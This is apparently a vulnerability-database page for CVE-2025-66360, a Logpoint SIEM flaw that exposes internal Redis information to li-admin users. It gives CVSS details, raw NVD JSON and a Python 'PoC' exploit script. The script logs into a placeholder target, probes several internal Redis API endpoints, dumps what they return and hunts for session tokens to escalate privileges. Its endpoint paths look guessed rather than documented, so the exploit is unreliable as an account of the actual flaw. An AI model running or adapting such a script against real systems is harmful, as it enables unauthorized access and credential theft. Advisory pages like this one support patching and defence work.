Security Vulnerability Report
中文
CVE-2025-66360 CVSS 8.8 HIGH

CVE-2025-66360

Published: 2025-11-28 00:15:46
Last Modified: 2025-12-03 19:12:45

Description

An issue was discovered in Logpoint before 7.7.0. An improperly configured access control policy exposes sensitive Logpoint internal service (Redis) information to li-admin users. This can lead to privilege escalation.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:logpoint:siem:*:*:*:*:*:*:*:* - VULNERABLE
Logpoint < 7.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-66360 PoC - Logpoint Redis Information Exposure # Target: Logpoint < 7.7.0 TARGET = "https://target-logpoint.example.com" USERNAME = "li_admin_user" PASSWORD = "password" def exploit_redis_exposure(): """Exploit CVE-2025-66360: Redis internal service information exposure""" # Step 1: Authenticate as li-admin user login_url = f"{TARGET}/api/v1/auth/login" login_data = { "username": USERNAME, "password": PASSWORD } session = requests.Session() response = session.post(login_url, json=login_data, verify=False) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return None token = response.json().get('token') print(f"[+] Successfully authenticated as li-admin") # Step 2: Access exposed Redis internal endpoint redis_endpoints = [ "/api/v1/internal/redis/config", "/api/v1/internal/redis/keys", "/api/v1/internal/redis/cache", "/api/v1/system/redis/info" ] exposed_data = {} for endpoint in redis_endpoints: headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } response = session.get(f"{TARGET}{endpoint}", headers=headers, verify=False) if response.status_code == 200: print(f"[+] Exposed endpoint found: {endpoint}") exposed_data[endpoint] = response.json() # Step 3: Extract sensitive information print("\n[+] Extracted Redis Information:") print(json.dumps(exposed_data, indent=2)) # Step 4: Use exposed data for privilege escalation if exposed_data: session_token = exposed_data.get('session_tokens') or exposed_data.get('auth_tokens') if session_token: print(f"[+] Found session tokens for privilege escalation") # Use tokens to access admin functions return exposed_data if __name__ == "__main__": exploit_redis_exposure()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66360", "sourceIdentifier": "[email protected]", "published": "2025-11-28T00:15:46.253", "lastModified": "2025-12-03T19:12:44.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Logpoint before 7.7.0. An improperly configured access control policy exposes sensitive Logpoint internal service (Redis) information to li-admin users. This can lead to privilege escalation."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:logpoint:siem:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.7.0", "matchCriteriaId": "D6A6E475-FAB2-42A4-9805-F137CDBDEB61"}]}]}], "references": [{"url": "https://servicedesk.logpoint.com/hc/en-us/articles/29160917867549-Redis-communication-exposed-for-internal-communication", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}